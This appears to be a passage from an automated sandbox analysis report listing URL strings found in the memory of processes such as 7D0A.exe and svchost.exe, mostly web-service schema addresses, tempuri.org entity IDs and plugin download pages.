                          Source: svchost.exe, 00000012.00000002.407131420.000001994C700000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.409739302.0000000004F53000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.413788318.0000000004F53000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: svchost.exe, 00000012.00000002.406719122.000001994C0EB000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                          Source: 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                          Source: svchost.exe, 00000012.00000003.378171100.000001994C78D000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.377817839.000001994C77C000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.378193958.000001994C7CE000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: 7D0A.exe, 00000025.00000002.523221943.0000000002B80000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                          Source: 7D0A.exe, 00000025.00000002.523221943.0000000002B80000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: svchost.exe, 00000006.00000002.309122686.000001F894E13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
